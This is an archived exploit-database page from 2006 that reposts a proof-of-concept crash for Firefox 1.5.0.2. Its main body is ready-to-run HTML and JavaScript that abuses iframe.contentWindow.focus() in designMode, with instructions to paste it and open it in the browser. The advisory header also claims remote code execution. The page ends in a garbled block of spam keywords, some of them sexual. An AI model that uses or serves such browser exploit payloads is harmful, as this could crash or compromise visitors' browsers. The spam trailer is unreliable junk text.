about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , Mozilla Firefox <= 1.5.0.2 (js320.dll/xpcom_core.dll) Denial of Service PoC




2006-04-24 Mozilla Firefox <= 1.5.0.2 (js320.dll/xpcom_core.dll) Denial of Service PoC
Rated as : Critical

<!--
---------------------------------------------------
Software:  
 Firefox Web Browser
Tested: 
 Linux, Windows clients' version 1.5.0.2
Result:  
 Firefox Remote Code Execution and Denial of Service - Vendor contacted,
no patch yet.
Problem:
 A handling issue exists in how Firefox handles certain Javascript in
js320.dll and xpcom_core.dll
regarding iframe.contentWindow.focus().  By manipulating this feature a
buffer overflow will occur.  
Proof of Concept:
 http://www.securident.com/vuln/ff.txt
Credits:
 splices(splices [dot] org)
 spiffomatic64(spiffomatic64 [dot] com)
 Securident Technologies (securident [dot] com)
------------------------------------------------ 

http://www.securident.com/vuln/ffdos.htm - PoC firefox dos
 
 Paste the below code snippet and view it in Firefox for DoS PoC or visit
the link above. -->

<textarea cols="0" rows="0"
id="x_OtherInfo"
name="x_OtherInfo"></textarea> 
  <script> 
       var textarea = document.getElementsByName("x_OtherInfo");

       textarea=textarea.item(0); 
           var htmlarea = document.createElement("div"); 
       htmlarea.className = "htmlarea";  
       textarea.parentNode.insertBefore(htmlarea, textarea); 
       var iframe = document.createElement("iframe"); 
       htmlarea.appendChild(iframe);
            var doc = iframe.contentWindow.document; 
                 doc.designMode = "on"; 
                 doc.open(); 
                 doc.write("<iframe src=''>");
          iframe.contentWindow.focus() 
  doc.close(); 
  </script>
</textarea>

<!--
-DISCLAIMER-
splices,spiffomatic64, and securident are not responsible for any of the
information contained therein, 
this is all just for informational purposes only. -->
securitydot.net - 2006-04-24

Advertising

Copyright 2007, SecurityDot
Tue, 15 Dec 2009 05:16:09 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
www.sounba Naket.com ip board 2 VIDEO SXE www.chyii. news for c puking to www.12dn.c news for c Tone www.fashio sexpictuer sexse free www.xthjb. animalsexy openssl as www.jjkk36 www.jjkk36 Anarkale Privet.com maxcpm.inf ip+board+2 indian tam ip+board+2 www.yptsho teen sex mambo Remo down.speed Dell trisha bat ngentot an WWW .SXEY t101t www.xthjb. Powered b Ashwaria r www.womana keys 44345 www.yntian www.30ykj. www.lover5 mysql 5.0. eve fforum www.lover5 iixenikusu MIB keys dmoz.im www sexy g